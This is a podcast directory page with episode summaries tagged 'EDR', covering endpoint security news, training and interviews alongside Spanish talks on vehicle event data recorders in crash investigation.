Podcasts about EDR

  • 356 PODCASTS
  • 870 EPISODES
  • 49m AVG DURATION
  • 5 WEEKLY NEW EPISODES
  • Dec 11, 2025 LATEST

Latest podcast episodes about EDR

The CyberWire
Weak passwords meet strong motives

Dec 11, 2025 · 31:10


CISA warns that pro-Russia hacktivist groups are targeting US critical infrastructure. Google patches three new Chrome zero-day vulnerabilities. North Korean actors exploit React2Shell to deploy a new backdoor. Researchers claim Docker Hub secret leakage is now a systemic problem. Attackers exploit an unpatched zero-day in Gogs, the self-hosted Git service. IBM patches more than 100 vulnerabilities across its product line. Storm-0249 abuses endpoint detection and response tools. The DOJ indicts a former Accenture employee for allegedly misleading federal customers about cloud security. Our guest is Kavitha Mariappan, Chief Transformation Officer at Rubrik, talking about understanding & building resilience against identity-driven threats. A malware tutor gets schooled by the law.

CyberWire Guest

On today's Industry Voices segment, we are joined by Kavitha Mariappan, Chief Transformation Officer at Knowledge Partner Rubrik, talking about understanding and building resilience against identity-driven threats. Tune into Kavitha's full conversation here.

  • New Rubrik Research Finds Identity Resilience is Imperative as AI Wave Floods the Workplace with AI Agents (Press release)
  • The Identity Crisis: Understanding and Building Resilience Against Identity-Driven Threats (Report)
  • Agentic AI and Identity Sprawl (Data Security Decoded podcast episode): Host Caleb Tolin and guest Joe Hladik, Head of Rubrik Zero Labs, unpack the findings from the report Kavitha addresses.

Resources: Rubrik's Data Security Decoded podcast airs semi-monthly on the N2K CyberWire network with host Caleb Tolin. You can catch new episodes twice a month on Tuesdays on your favorite podcast app.

Selected Reading

  • CISA: Pro-Russia Hacktivists Target US Critical Infrastructure
  • New cybersecurity guidance paves the way for AI in critical infrastructure | CyberScoop
  • Google Releases Critical Chrome Security Update to Address Zero-Days - Infosecurity Magazine
  • North Korea-linked 'EtherRAT' backdoor used in React2Shell attacks | SC Media
  • Thousands of Exposed Secrets Found on Docker Hub - Flare
  • Hackers exploit unpatched Gogs zero-day to breach 700 servers
  • IBM Patches Over 100 Vulnerabilities - SecurityWeek
  • Ransomware IAB abuses EDR for stealthy malware execution
  • US charges former Accenture employee with misleading feds on cloud platform's security - Nextgov/FCW
  • Man gets jail for filming malware tutorials for syndicate; 129 Singapore victims lost S$3.2m - CNA

The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc.

Paul's Security Weekly
Tech Segment: MITM Automation + Security News - Josh Bressers - PSW #904

Dec 11, 2025 · 127:47


This week in our technical segment, you will learn how to build a MITM proxy device using Kali Linux, some custom scripts, and a Raspberry Pi!

In the security news:

  • Hacking Smart BBQ Probes
  • China uses us as a proxy
  • LOLPROX and living off the Hypervisor
  • Are we overreacting to React4Shell?
  • Prolific Spyware vendors
  • EDR evaluations and tin foil hats
  • Compiling to Bash!
  • How e-waste became a conference badge
  • Overflows via underflows and reporting to CERT
  • Users are using AI to complete mandatory infosec training!
  • AI in your IDE is not a good idea
  • Cybercrime is on the rise, and it's the kids
  • AI can replace humans in power plants
  • Will AI prompt injection ever go away?
  • To use a VPN or to not use a VPN, that is the question

Visit https://www.securityweekly.com/psw for all the latest episodes!

Show Notes: https://securityweekly.com/psw-904

Technology Tap
Endpoint Security Threats and Defenses | Cybersecurity Fundamentals Chapter 10

Dec 4, 2025 · 30:43


In this episode of Technology Tap: CompTIA Study Guide, we delve into endpoint security—a crucial topic for anyone preparing for IT certification exams, especially CompTIA. Traditional firewalls no longer fully protect your network; attackers now exploit endpoints like laptops, phones, printers, and smart devices to breach security. We explore how threats bypass perimeter defenses by targeting users and devices directly, and explain essential controls such as hardening, segmentation, encryption, patching, behavior analytics, and access management. Whether you're studying for your CompTIA exam or seeking practical IT skills development, this episode offers critical insights and IT certification tips to strengthen your understanding of cybersecurity fundamentals. Tune in to enhance your tech exam prep and advance your technology education journey.

We start with foundations that actually move risk: baseline configurations, aggressive patch management, and closing unnecessary ports and services. From there we layer modern defenses—EDR and XDR for continuous telemetry and automated containment, UEBA to surface the 3 a.m. login or odd data pulls, and the underrated duo of least privilege and application allow listing to deny unknown code a chance to run. You'll hear why full disk encryption is non‑negotiable and how policy, not heroics, sustains security over time.

Mobile endpoints take center stage with clear tactics for safer travel and remote work: stronger screen locks and biometrics, MDM policies that enforce remote wipe and jailbreak detection, and connection hygiene that favors VPN and cellular over public Wi‑Fi. We break down evil twin traps, side loading risks, and permission sprawl, then pivot to IoT realities—default passwords, stale firmware, exposed admin panels—and how VLAN isolation and firmware schedules defang them. A real case of a chatty lobby printer becoming an attack pivot drives home the need for logging and outbound controls through SIEM.

The takeaway is simple and urgent: if it connects, it can be attacked, and if it's hardened, segmented, encrypted, and monitored, it can be defended. Subscribe for more practical security deep dives, share this with a teammate who owns devices or networks, and leave a review to tell us which control you'll deploy first.

Art By Sarah/Desmond
Music by Joakim Karud
Little chacha Productions

Juan Rodriguez can be reached at:
  • TikTok @ProfessorJrod
  • ProfessorJRod@gmail.com
  • @Prof_JRod
  • Instagram ProfessorJRod

Joey Pinz Discipline Conversations
#781 ITNation Connect 2025 - Mike DePalma: Building Stronger Channel Partnerships: Lessons from the OpenText Playbook

Dec 3, 2025 · 36:58


At IT Nation Connect 2025, Mike DePalma—VP of SMB Cybersecurity at OpenText—sits down with Joey Pinz to talk about rebuilding community in the MSP world, evolving vendor programs, and the tidal wave of AI reshaping security and operations.

Mike shares how OpenText's new EDR rollout is simplifying life for ConnectWise partners, the surprising results of their latest MSP Report, and why most AI projects fail—hint: it's not the tech. He opens up about the Datto → Kaseya acquisition, lessons in leadership, and why discipline, presence, and family still define success more than revenue or market share.

No Password Required
No Password Required Podcast Episode 66 — Danny Jenkins

Dec 3, 2025 · 36:58


Danny Jenkins — Founder of ThreatLocker and the Zero-Trust Revolution

Danny Jenkins is the CEO of ThreatLocker, the leading cybersecurity company that he built alongside his wife. Hosts Jack Clabby of Carlton Fields, P.A., and Kayley Melton of the Cognitive Security Institute follow Danny's journey from a scrappy IT consultant to leading one of the fastest-growing cybersecurity companies in the world.

Danny shares the moment everything changed: watching a small business nearly collapse after a catastrophic ransomware attack. That experience reshaped his mission and ultimately sparked the creation of ThreatLocker. He also reflects on the gritty early days—cold-calling from his living room, coding through the night, and taking on debt before finally landing their first $5,000 customer.

Danny explains the origins of Zero Trust World, his passion for educating IT teams, and why adopting a hacker mindset is essential for modern defenders.

In the Lifestyle Polygraph, Danny relates his early “revenge tech” against school bullies, the place he escapes to when celebrating big wins, and the movie franchise he insists is absolutely a Christmas classic.

Follow Danny on LinkedIn: https://www.linkedin.com/in/dannyjenkins/

  • 00:00 Introduction to Cybersecurity and ThreatLocker
  • 02:26 The Birth of ThreatLocker: A Personal Journey
  • 05:42 The Evolution of Zero Trust Security
  • 08:35 Real-World Impact of Cyber Attacks
  • 11:25 The Importance of a Hacker Mindset
  • 14:46 The Role of SOC Teams in Cybersecurity
  • 17:34 Building a Culture of Security
  • 20:23 Hiring for Passion and Skill in Cybersecurity
  • 23:44 Understanding Zero Trust: Trust No One
  • 26:32 Lifestyle Polygraph: Personal Insights and Fun
  • 29:41 Conclusion and Future of ThreatLocker

Hacker Valley Studio
Building EDR for AI: Controlling Autonomous Agents Before They Go Rogue with Ron Eddings

Dec 2, 2025 · 19:36


AI agents aren't just reacting anymore, they're thinking, learning, and sometimes deleting your entire production database without asking. The real question isn't if your AI agent will be hacked, it's when, and whether you'll have the right hooks in place to stop it before it happens.

In this episode, Ron breaks down the ChatGPT Atlas vulnerability that shocked researchers, revealing how malicious prompts can turn AI assistants against their own users by bypassing safeguards and accessing file systems. He presents his new talk "Hooking Before Hacking," introducing a framework for applying EDR principles (prevention, detection, and response) to AI agents before they execute unauthorized commands. From pre-tool use hooks that catch malicious intent to one-time passwords that put humans back in the loop, this episode shares practical security controls you can implement today to prevent your AI agents from going rogue.

Impactful Moments:

  • 00:00 - Introduction
  • 02:00 - ChatGPT Atlas vulnerability exposed
  • 04:00 - AI technology outpacing security guardrails
  • 05:00 - Guardrail jailbreaks and prompt injection
  • 06:00 - AI agents deleting production databases
  • 07:00 - EDR principles for AI agents
  • 09:00 - Pre-tool use hooks catch intention
  • 11:00 - User prompt sanitization prevents leaks
  • 14:00 - One-time passwords for agent workflows
  • 16:00 - Automation mistakes across 10 years

Links:

  • Connect with Ron on LinkedIn: https://www.linkedin.com/in/ronaldeddings/
  • Check out the entire article here: https://www.yahoo.com/news/articles/cybersecurity-experts-warn-openai-chatgpt-101658986.html
  • GitHub Repository: https://hackervalley.com/hooking-before-hacking
  • See Ron's "Hooking Before Hacking" presentation slides here: http://hackervalley.com/hooking-before-hacking-presentation
  • Check out our website: https://hackervalley.com/

InfosecTrain
What Is Endpoint Detection and Response EDR Explained

Nov 30, 2025 · 5:12


This episode breaks down Endpoint Detection and Response (EDR) and why it has become a core element of modern cybersecurity. You'll learn how EDR monitors devices in real time, detects sophisticated threats, supports deep investigations, and enables instant response to minimize damage. A perfect starting point for anyone looking to understand how organizations strengthen endpoint security against today's evolving attacks.

Security Squawk
Ransomware Reality Check: Inside “The Gentlemen” Gang

Nov 25, 2025 · 30:06


In this Security Squawk episode, Brian Horning from Xact IT is joined by guests to unpack three real ransomware incidents, the rapid rise of “The Gentlemen” gang, and how attackers bypass basic security by turning off tools like Windows Defender. You'll learn why relying only on built-in protections creates dangerous blind spots, what layered security with EDR, SOC monitoring, and log retention looks like, and the practical steps business leaders can take now to harden their defenses and reduce ransomware risk.

Threat Talks - Your Gateway to Cybersecurity Insights

The world's biggest open-source ecosystem - npm - faced its first self-spreading worm. They called it Shai Hulud. It didn't just infect one package. It infected developers themselves.

When a maintainer got phished, the worm harvested credentials, hijacked tokens, and created new CI/CD workflows to keep spreading - automatically. No command-and-control. No manual uploads. Just a chain reaction across the npm registry.

And while the world was busy shouting about “2.6 billion downloads affected,” this real threat was quietly exfiltrating GitHub, cloud, and npm secrets - right under everyone's nose.

This isn't just another npm story. It's the first-ever self-replicating supply chain worm - and a wake-up call for every developer and security team building in the open.

Watch host Rob Maas (Field CTO, ON2IT) and Yuri Wit (SOC Analyst, ON2IT) break down how it started, how it spread, and how to make sure your pipeline isn't the next one to go viral.

  • (00:00) - Intro, welcome & what npm is
  • (00:01) - Crypto drainer: how it worked, maintainer phish & real impact
  • (00:05) - “Shai Hulud” worm: credential harvesting & package spread
  • (00:07) - Hype vs reality: the “2.6 billion downloads” myth & media reaction
  • (00:10) - Defenses: dependency strategy & CI/CD workflow alerts
  • (00:14) - Secrets hygiene, OS targeting (Windows exit), end-user/EDR tips & takeaways

Key Topics Covered

  • How a maintainer phish and TOTP capture led to a crypto drainer in npm.
  • Why Shai Hulud's credential harvesting + CI/CD persistence makes it high-impact.
  • Practical defenses: pin/review dependencies, CI/CD change alerts, secret rotation, egress monitoring.
  • What developers vs. end users can (and can't) do in supply-chain attacks.

Guest and Host Links:

  • Rob Maas (Field CTO, ON2IT): https://www.linkedin.com/in/robmaas83/
  • Yuri Wit (SOC Analyst, ON2IT): https://www.linkedin.com/in/yuriwit/

Additional Resources

  • Threat Talks: https://threat-talks.com/
  • ON2IT (Zero Trust as a Service): https://on2it.net/
  • AMS-IX: https://www.ams-ix.net/ams
  • npm: https://www.npmjs.com/
  • Node.js: https://nodejs.org/
  • GitHub Docs: Actions & Workflows: https://docs.github.com/actions
  • MetaMask: https://metamask.io/
  • OWASP Dependency Management: https://owasp.org/www-project-dependency-check/
  • SLSA Supply-chain Levels for Software Artifacts: https://slsa.dev/

CISSP Cyber Training Podcast - CISSP Training Program
CCT 300: Failing Securely, Simply, Separation of Duties, KISS and Zero Trust (CISSP)

Nov 24, 2025 · 44:36


Check us out at: https://www.cisspcybertraining.com/

Security programs fail when they try to do everything at once. We walk through a clear three-phase plan that keeps you focused and effective: start with a real gap assessment anchored in leadership's risk tolerance, convert findings into decisions to mitigate, accept, or transfer risk, and then implement with a balanced mix of people, process, and tools. Along the way, we share what to look for when hiring a virtual CISO and how to turn that engagement into actionable momentum instead of another shelfware report.

From there, we tighten the perimeter by defining bounds that keep systems within safe lanes: role-based access control, data classification, DLP, segmentation, encryption, and change management that shrinks blast radius. We get tactical with process isolation, sandboxing, capability-based security, and application whitelisting, plus a grounded comparison of MAC vs DAC and when a hybrid model makes sense. Defense in depth ties it together with physical safeguards, network protections, EDR and patching, application security practices, and data security. We keep the human layer practical with targeted awareness training and a tested incident response plan.

Resilience is the throughline. We advocate for secure defaults and least privilege by design, logging that's actually reviewed, and updates that apply on a measured cadence. When things break, fail safely: graceful degradation, clean error handling, separation of concerns, redundancy, and real-world drills that expose weak spots early. Governance keeps the program honest with separation of duties, dual control, job rotation, and change boards that prevent unilateral risk. Finally, we demystify zero trust: start small, micro-segment your crown jewels, verify continuously, and respect cloud nuances without overcomplicating your stack.

Programa del Motor: AutoFM
Marcos Pérez, engineer and traffic accident investigator

Nov 22, 2025 · 6:09


We talk with Marcos Pérez, engineer and traffic accident investigator, at the CESVIMAP 2025 International Congress on Traffic Accident Investigation.

1. Who Marcos Pérez is and what he does

  • Mechanical engineer, traffic accident reconstructionist and investigator.
  • He is also a speaker at the Congress on Traffic Accident Investigation.
  • Career:
    • He started out in the Department of Mechanical Engineering at the University of Vigo.
    • There he joined a traffic accident research group.
    • He has been working in this field since 2001.
  • In 2007, on completing his final-year project and with the university project coming to an end, he set up an independent company together with his former boss (now his partner), focused on:
    • Accident investigation and reconstruction.
    • Technical matters related to the automobile.

2. The "black box" we all carry: the mobile phone

  • Central idea of his talk:
    • Besides the "black boxes" in aircraft or the EDR in vehicles, we all carry a kind of black box in our pocket: the mobile phone.
  • Telephone and service companies (e.g. Google) record people's movements and locations.
  • The DGT already ran a pilot years ago using mobile phone positioning data to study population movements.
  • Marcos explains how to extract that data from phones and use it in:
    • Traffic accident investigation.
    • Determining a person's position and trajectory.

3. Practical application: collisions with pedestrians

  • Beyond cars and motorcycles, the mobile phone is very useful in cases where a pedestrian is hit.
  • If the pedestrian is carrying the phone (pocket, backpack, etc.), the following can be obtained:
    • Prior trajectory (where they were walking from).
    • The pedestrian's speed at a specific instant, via GPS.
  • If that instant coincides with, or is very close to, the moment of the accident:
    • A very reliable speed figure is obtained.
    • That figure helps reconstruct what the pedestrian was doing and can provide relevant indications about responsibility for the collision.
  • Important: it does not replace the other evidence; it is an additional data source.

4. Evolution of the quality of location data

  • Previously, if the phone's GPS was switched on, a location point was recorded every second or nearly so.
  • Recent changes due to European privacy regulations:
    • The collection and storage of data on servers (e.g. Google) is limited.
    • The information is now stored much more on the phone itself and less in the cloud.
    • The phone has limited capacity, so it keeps fewer data points.
  • Marcos's personal example:
    • Location history enabled since 2013.
    • Before: the file took up about 2 GB.
    • Now: it takes up only 78 MB.
  • Conclusion: the density and continuity of the data have dropped considerably, which limits the temporal precision available for reconstruction.

5. Specialization in the automobile: beyond "classic" reconstruction

Marcos's company has specialized very vertically in the automobile:

  1. Traffic accident reconstruction
  2. Unusual accidents / unusual claims:
    • Airbags that do not deploy or that allegedly work incorrectly.
    • Possible vehicle malfunctions.
  3. Analysis of breakdowns under warranty:
    • Technical assessment of breakdowns in vehicles still within the warranty period.
  4. Vehicle fire investigation:
    • They investigate the technical cause of the fire; they do not put an economic value on it (they do not carry out the damage appraisal).
    • They analyze vehicle fires and, in some cases, structure fires only when a vehicle is involved.

6. Complex cases and collaboration with the Guardia Civil (UCO)

  • Their high degree of specialization in the automobile leads them to collaborate on cases of criminal and media significance:
    • Collaboration with the Guardia Civil's UCO on the DIANA QUER case:
      • His company helped identify a vehicle from images.
    • Other cases mentioned:
      • The Manuel Achavero case (Badajoz).
      • A case in Valladolid that has not yet gone to trial.
  • They also come across:
    • Guardrails (W-beam barriers) that work and others that do not,
    • Collisions with other means of transport.
  • There are matters he cannot yet detail because they are pending judicial resolution, with a commitment to explain them in depth once they have been tried.

Full video: https://youtu.be/ZpMOeuSaDAE?si=vBMdNQ8jbWb2S5_e

Programa del Motor: AutoFM
José Antonio Maurenza (CESVIMAP) on the crash test between an EV and a combustion car

Nov 22, 2025 · 11:00


We chat with José Antonio Maurenza (CESVIMAP) about the crash test between an electric car and a combustion car at the CESVIMAP 2025 International Congress on Traffic Accident Investigation:

1. Context of the test and the congress

  • CESVIMAP stages an "open-air" crash test as the centrepiece of the congress:
    • Vehicle 1: Volkswagen ID.3, 100% electric, 1,800 kg.
    • Vehicle 2: Renault Mégane, combustion, 1,400 kg, older.
  • Storytelling strategy:
    • The impact is carried out on the first day,
    • The technical conclusions are presented at the end of the congress, cross-referenced with what the other speakers have presented.

2. Technical objective of the crash test

  • Analyze and compare:
    • How data is extracted from a modern vehicle (ID.3, with EDR / data recorder).
    • What has to be done to obtain data from an old vehicle without those electronics.
  • Key message:
    • In the modern car: quick and simple data readout.
    • In the old car: a whole day of instrumentation (accelerometers at various points) to record accelerations and deformations.

3. How the impact unfolded and practical difficulties

  • Test: rear-end collision at a planned speed of 35 km/h.
  • Actual data:
    • The electric vehicle's data box records an impact speed of 38 km/h.
    • A steering-wheel turn of about 8 degrees is detected, which slightly deflects the trajectory.
  • Added difficulty:
    • No fixed indoor guide is used; the test is done outdoors with a remote-controlled car and no physical track.
    • They needed four days adjusting the speed so that the theoretical conditions are met in the 2–3 seconds the run lasts.
  • Teaching value:
    • Even in a highly controlled environment there are non-ideal variables; explaining these deviations adds value to the technical reconstruction work.

4. Main results: speeds, ΔV and decelerations

  • Electric vehicle (ID.3):
    • Impact speed: ~38 km/h.
    • ΔV ≈ 21 km/h.
    • Deceleration ≈ 12 g, measured by the vehicle itself.
    • Activations:
      • Driver airbag (the passenger airbag was switched off).
      • Curtain airbags.
      • Seat-belt pretensioners.
  • Struck vehicle (Renault Mégane):
    • Weight: 1,400 kg.
    • As it was in neutral with no brake applied, after the impact the Mégane is thrown forward at ~25 km/h.
    • Severe damage to the rear ("not disintegrated, but very badly damaged").
    • The child dummy in the rear seat ends up with its knees practically pressed against the front seatback, which illustrates the importance of energy management for rear occupants.

5. Comparison with the usual 15 km/h crash tests

  • CESVIMAP routinely carries out crash tests at 15 km/h against a rigid 35-tonne wall:
    • All the speed is transformed into deformation energy in the vehicle, with a high ΔV and high deceleration.
  • In a car-to-car rear-end collision:
    • The deformation is more progressive, since the car does not hit a completely non-deformable element.
    • The ΔV of the impact at ~35–38 km/h (21 km/h) is not so different from the ΔV of the 15 km/h wall test (~16 km/h).
  • The key difference lies in the time over which that ΔV is applied:
    • Similar ΔV over different times → different decelerations (the shorter the time, the higher the g).

6. Instrumentation of the Mégane and a lesson on where to measure

  • The Mégane was fitted with accelerometers:
    • On the rear structure / boot: decelerations ≈ 12 g.
    • On the head-restraint rod, not on the dummy's head: peaks ≈ 21 g.
  • Acknowledgement of limits:
    • CESVIMAP does not have approved sensors for a dummy's head, which is why they did not place the accelerometer there.
    • This opens the door for a laboratory to provide instrumented dummies in the future and for joint tests to be carried out.

7. Key messages of the talk

  • The ease of extracting data from modern vehicles does not remove the need for a qualified reconstructionist:
    • The data has to be interpreted and put in context, avoiding simplistic conclusions.
  • The real complexity of an accident shows when, even with everything planned, deviations arise (8° turn, slightly different speed).
  • CESVIMAP's know-how is demonstrated:
    • Control of ΔV, decelerations and structural damage.
    • Ability to design complex tests outside the laboratory "comfort zone".
  • A field for future collaboration opens up:
    • SHARED TESTS with biomechanics laboratories and highly instrumented dummies, making it possible to relate:
      • Decelerations in the structure.
      • Actual decelerations in the occupants' head and thorax.

Full video: https://youtu.be/ZpMOeuSaDAE?si=vBMdNQ8jbWb2S5_e

Programa del Motor: AutoFM
Javier Roch, Mossos d'Esquadra officer

Nov 22, 2025 · 3:55


Javier Roch, a member of the Mossos d'Esquadra in the Traffic Accident Investigation Department, has spent more than 20 years reconstructing crashes. He explains that when he started, a car was "a metal box with wheels" and investigation was done with tape measures and sketches. Today, by contrast, they have laser scanners and drone photogrammetry to capture scenes in 3D, and vehicles have become true computers on wheels that record a large amount of data useful for finding out what happened in an accident. That technological evolution has also brought structurally much safer cars: at the same speed, an impact that twenty years ago caused very serious injuries can today have far milder consequences.

One of the key pieces of this new era is the EDR (Event Data Recorder), the car's "black box". Roch stresses that these devices are designed to store only technical data for a few seconds before the impact: speed, brake use, accelerator use, engine revolutions, etc. He argues that the driver's privacy is not invaded, because the speed at which one drives on a public road is not private data (just as it can be measured with a radar, it can be read from the EDR in a serious crash), and that information is essential to clarify what happened and to reach fairer judicial decisions.

Despite all the technological progress, a very basic problem remains: seat-belt use. Roch notes that there are still too many occupants, especially in the rear seats, who do not wear it because they are "only going nearby" or "going slowly" and believe nothing will happen to them. His message is blunt: the seat belt saves lives without fail in rollovers and relatively "normal" impacts, at 50, 60 or 70 km/h, precisely the speeds at which many people take it off thinking it is not needed. Even at very high speeds it always helps somewhat, but where it really makes the difference, and where it decides whether you walk away unharmed or not, is on those everyday trips where people get overconfident.

Full video: https://youtu.be/ZpMOeuSaDAE?si=vBMdNQ8jbWb2S5_e

Programa del Motor: AutoFM
Isabel López Fiscal Seguridad Vial Cataluña

Programa del Motor: AutoFM

Play Episode Listen Later Nov 22, 2025 6:41


Isabel López Riera has been the road safety prosecutor in Catalonia since 2013, when she was appointed the specialist in this field at the Barcelona Provincial Prosecutor's Office. She explains that, within the Prosecutor's Office, work is organised by specialty: each prosecutor concentrates primarily on one specific area (road safety, gender-based violence, minors, etc.), which allows much greater depth in each field and raises the quality of the work. In her case, she deals above all with the most serious crashes: those involving fatalities or victims with especially serious injuries, both in the capital (the city of Barcelona) and in the territorial sections of the Prosecutor's Office and the rest of the province.

Her day-to-day work starts as soon as a serious crash occurs: she learns of the matter from the very first moment and goes to the court so that the proceedings are handled by the prosecutor specialising in road safety. From there, she pushes the investigation forward so that the case does not drag on indefinitely in the investigation phase: she requests investigative measures, checks that the necessary evidence is gathered, and tries to have the matter resolved as soon as possible, either by closing the case if there is no offence or by taking it to trial where appropriate. When there is an oral trial, the prosecution takes part in court defending the legal classification of the facts and, if a conviction is handed down, it also takes part in the enforcement phase of the sentence, making sure that what was ordered is carried out and, very particularly, that the rights of victims are respected and criminal liability is demanded of whoever bears it.

On the public perception that "only a culprit is being sought" rather than the technical causes of the crash, Isabel dismantles the idea at its root: for her the two things are absolutely linked. To decide whether someone is responsible, one first has to know with the greatest rigour what happened. And there the role of the security forces (the judicial traffic police) is essential. They are the ones who reconstruct the crash and describe to the court what happened and with what dynamics, and that technical basis is what later makes it possible to assess whether or not there was criminally reprehensible conduct. Sometimes that investigation reveals clear criminal liability; at other times the conclusion is that the person involved has not committed an offence, even though there was an accident. But without a good prior technical analysis, there is no serious way to draw that line.

In that context, technology, and in particular the EDR, the vehicle's data recording system, is, as she explains, one more tool in the service of that reconstruction. She stresses that the EDR is not a "black box" in the style of aircraft, but a very specific record of the car's technical parameters: for about five seconds before the impact and up to the collision, the system stores data such as speed, whether the brake was pressed, the state of certain systems, etc. These data do not replace the rest of the evidence but are added to it: they have to be related to witness statements, police reports, measurements at the scene, traffic cameras, traditional speed studies and any other investigative measure that has been carried out. Used well, they help refine the reconstruction and get closer to the truth of what happened.

Regarding the fear of some drivers that the EDR violates their privacy, Isabel is clear: the Prosecutor's Office considers that fundamental rights are not being affected. The data the EDR collects are technical, objective data about the vehicle, not personal information about the driver's private life. Knowing how fast the car was going or whether the brake was pressed just before the crash has nothing to do, she points out, with recording conversations, prolonged locations or intimate aspects of the person. They are physical parameters of the vehicle at a very specific moment, linked to an event of criminal significance, and that is why they understand that they do not intrude on the right to privacy.

Finally, the prosecutor also looks at the impact of new mobility, especially Personal Mobility Vehicles (such as electric scooters), on the accident rate in Catalonia, and very particularly in Barcelona. She notes that the arrival of new vehicles and new ways of getting around the city increases risk if they are not accompanied by clear rules and a culture of safety. The result is a growing incidence of crashes and traffic conflicts. The latest legal reforms, such as the introduction of compulsory insurance and other measures on PMVs, are aimed precisely at bringing order to this situation and guaranteeing that, when a crash occurs, victims are protected and there are clear mechanisms for demanding liability and compensating for damage. For her, in the end, it all comes down to the same thing: combining technical expertise, law and technology to understand properly what happened and to protect, as far as possible, those who are harmed on the road.

Cyber Security Today
Cybersecurity Today: CloudFlare Outage, Microsoft's AI Risk, New Red Team Tool, and More!

Cyber Security Today

Play Episode Listen Later Nov 19, 2025 15:38


In this episode of 'Cybersecurity Today,' host Jim Love covers multiple pressing topics: CloudFlare's major outage affecting services like OpenAI and Discord, Microsoft's new AI feature in Windows 11 and its potential malware risks, a new red team tool that exploits cloud-based EDR systems, and a new tactic using calendar invites as a stealth attack vector. Additionally, a critical SAP vulnerability scoring a perfect 10 on the CVSS scale is discussed alongside a peculiar event where Anthropic's AI mistakenly tried to report a cybercrime to the FBI. The episode wraps up with a mention of the book 'Alyssa, A Tale of Quantum Kisses' and a thank you to Meter for sponsoring the podcast. Tune in for essential cybersecurity insights.

00:00 Introduction and Sponsor Message
00:22 CloudFlare Outage Causes Major Disruptions
02:55 Microsoft's New AI Features and Malware Risks
05:22 Silent but Deadly: New Red Team Tool
07:39 Calendar Invites as a Stealth Attack Vector
10:04 Critical SAP Vulnerability
12:11 Anthropic's AI and the FBI Incident
14:06 Conclusion and Final Thoughts

Alliant Specialty Podcasts
The Future of Ransomware: Proactive Defense in an AI-Driven Threat Landscape

Alliant Specialty Podcasts

Play Episode Listen Later Nov 19, 2025 13:19


AI is accelerating ransomware attacks and reshaping the cyber threat landscape. Join Brendan Hall, Alliant Cyber, and Brad LaPorte, Morphisec, as they discuss how evolving ransomware tactics and polymorphic malware are challenging traditional cybersecurity defenses. Together they share how a preemptive approach to ransomware protection can help organizations reduce exposure, lower insurance costs and strengthen cyber resilience as AI continues to accelerate the speed and sophistication of attacks. They also highlight how Morphisec's patented technology and ransomware-free guarantee provide a powerful layer of protection that complements existing MDR and EDR tools.

PolySécure Podcast
SMB - Basic hygiene - Because... it's episode 0x665!

PolySécure Podcast

Play Episode Listen Later Nov 19, 2025 17:42


Because… it's episode 0x665!

Shameless plug
17 to 20 November 2025 - European Cyber Week
25 and 26 February 2026 - SéQCure 2026 CfP
14 to 17 April 2026 - Botconf 2026
28 and 29 April 2026 - Cybereco Cyberconférence 2026
9 to 17 May 2026 - NorthSec 2026
3 to 5 June 2025 - SSTIC 2026

Description
In this episode, the team of Nicolas, Dominique and Cindy explores the basic cybersecurity hygiene measures that small and medium-sized businesses should put in place. The goal is to identify low-cost solutions that deliver a significant security gain and help organizations meet certification and compliance requirements.

Authentication and password management
The first essential pillar is authentication and password management. Contrary to what some might think, passwords remain a critical issue and are the number one weakness in the majority of penetration tests. The problem affects passwords used to log in to external services as much as those used internally, including service accounts. The team strongly recommends adopting single sign-on (SSO) as soon as possible, despite the existence of a list of shame naming the companies that force their customers onto expensive plans to get SSO. The principle is simple: the fewer passwords there are, the better.

Using a password manager is non-negotiable. It is not enough to ask employees to use different, complex passwords for each site without giving them the appropriate tools. The experts warn against relying on the managers built into web browsers such as Chrome or Edge, which are not of the same quality as the true standalone password managers available on the market. A crucial point raised is that if someone compromises a machine as an administrator, they can access every password stored in the browser, whereas a dedicated password manager requires the master password for access, which provides additional protection even when the machine is compromised.

Workstation protection
The second fundamental element concerns what used to be called antivirus, now known as EDR (Endpoint Detection and Response). This minimum protection should be deployed in every environment, even on Mac computers. Although EDRs are not infallible and can be bypassed, they provide a first level of protection that is financially accessible. The team stresses the importance of choosing an EDR suited to the specific needs of the business, considering several factors: price, the number of workstations to protect, the support offered, the user interface, and whether or not there are in-house technical resources able to manage the solution. Some EDRs are easier to administer, while others offer more options but require training and qualified staff. These solutions are becoming more and more accessible to SMBs and are an essential building block of security.

Automatic updates
The third pillar addresses patching, those famous updates often seen as a necessary evil. For SMBs, the recommendation is clear: turn on automatic patching rather than relying on a daily manual check. This approach applies not only to internal systems but also to web applications such as WordPress. An important point raised is that turning on automatic patching probably implies having good backup management. For example, if WordPress updates itself automatically on Wednesday, it is prudent to take a backup on Tuesday so that you can restore quickly if there is a problem. This rule also applies to internal servers, although some sectors such as manufacturing or industrial settings may need a more nuanced approach. The team recalls that under Sécuritaire Canada, one of the assessment questions is precisely about enabling automatic patching on workstations, which should be standard practice.

Backup management
The fourth essential element is backups. A crucial recommendation is never to join backups to the domain. The team shares several anecdotes illustrating the consequences of poor backup management, such as the loss of ten years of personal photos or being unable to access an encrypted backup whose password was stored only on the failed primary machine. A backup is only as good as the last time it was tested. The experts have seen catastrophic situations in which organizations thought they had working backups but had never tested them, only to discover they were useless at the moment of an incident. Backups are not only for security incidents, but also for hardware failures, fires or other disasters. An important piece of advice: although encrypting backups is essential, you must make sure that the primary key is not stored only on the system being backed up. The same goes for the master password of a password manager, which should be kept on paper somewhere safe.

Additional measures
Beyond these four fundamental pillars, the team suggests a few additional measures. For businesses with a website, using a proxy service such as Cloudflare adds an accessible layer of protection that is close to free for SMBs. Although not infallible, this solution offers detection and protection against potential exploits while improving the site's performance and speed. For organizations using Active Directory, two free tools are recommended: Purple Knight from Semperis and Ping Castle (recently acquired by Tenable). These tools make it possible to run configuration audits and provide a security score without having to hire an expensive external auditor right away. They generate reports in HTML, PDF or Excel that help identify and fix the most obvious configuration problems.

The importance of the foundation
The team insists that before investing in complex, expensive tools such as dark web monitoring, it is essential to have a solid foundation. As with a house, if the foundations are shaky, the most beautiful construction will collapse. The good news is that this foundation is not necessarily expensive and that many free or inexpensive tools exist to establish a diagnosis and improve your security posture. One last crucial point, which will be the subject of a later episode, is employee awareness. Employees can be an organization's best ally or its worst weakness. This is not a one-off training session but a continuous effort. In conclusion, the experts point out that these basic elements are precisely the ones checked in insurance forms and certifications. Taking these preventive measures is comparable to a preventive medical check-up: it is far less costly and traumatic than emergency surgery after a major incident. Consulting an expert to put these basic measures in place generally costs less than dealing with the consequences of a cyberattack.

Collaborators
Nicolas-Loïc Fortin
Dominique Derrier
Cyndie Feltz
Nicholas Milot

Credits
